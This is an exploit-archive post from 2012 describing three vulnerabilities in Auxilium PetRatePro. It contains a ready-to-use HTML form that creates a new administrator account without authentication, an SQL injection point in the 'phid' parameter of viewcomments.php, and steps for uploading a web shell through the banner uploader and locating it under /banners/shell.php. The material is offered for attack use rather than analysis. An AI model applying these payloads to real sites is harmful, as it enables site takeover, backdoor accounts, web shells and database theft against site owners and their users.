Home / exploitsPDF  

Auxilium PetRatePro SQL Injection / Shell Upload

Posted on 17 September 2012

########################################## [~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities [~] Date: 14/09/2012 [~] Author: DaOne (@LibyanCA) [~] Software Link: http://www.auxiliumsoftware.com [~] Google Dork: "N/A" ########################################## [#] 1-[Remote Add Admin]: <form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();"> (Create New Administrator) Username <input name="username" type="text" id="name" size="20"> Password<input name="upassword" type="text" id="upassword" size="20"> Name<input name="name1" type="text" id="name1" size="20"> Email Address <input name="email" type="text" id="email" size="20"> <input type="submit" value="Create " name="B1"> </form> [#] 2-[SQL Injection] viewcomments.php parameter phid http://localhost/PetRatePro/viewcomments.php?phid=[SQLi] [#] 3-[Remote File Upload] Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php and upload your Shell... will find files here ... /PetRatePro/banners/shell.php ########################################## [*] Contact me www.facebook.com/DaOne.Ly ##########################################

 

TOP